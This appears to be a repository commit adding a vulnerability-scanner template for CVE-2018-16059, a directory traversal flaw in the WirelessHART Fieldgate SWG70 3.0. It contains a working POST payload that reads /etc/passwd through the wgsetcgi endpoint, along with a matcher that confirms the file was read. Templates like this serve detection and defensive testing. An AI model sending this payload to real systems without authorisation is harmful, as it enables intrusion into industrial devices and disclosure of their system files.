Create CVE-2018-16059.yaml
parent
0cb3c9d6b5
commit
5a5b5ea18e
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2018-16059
|
||||
|
||||
info:
|
||||
name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/45342
|
||||
tags: cve,cve2018,iot,lfi
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/fcgi-bin/wgsetcgi"
|
||||
body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue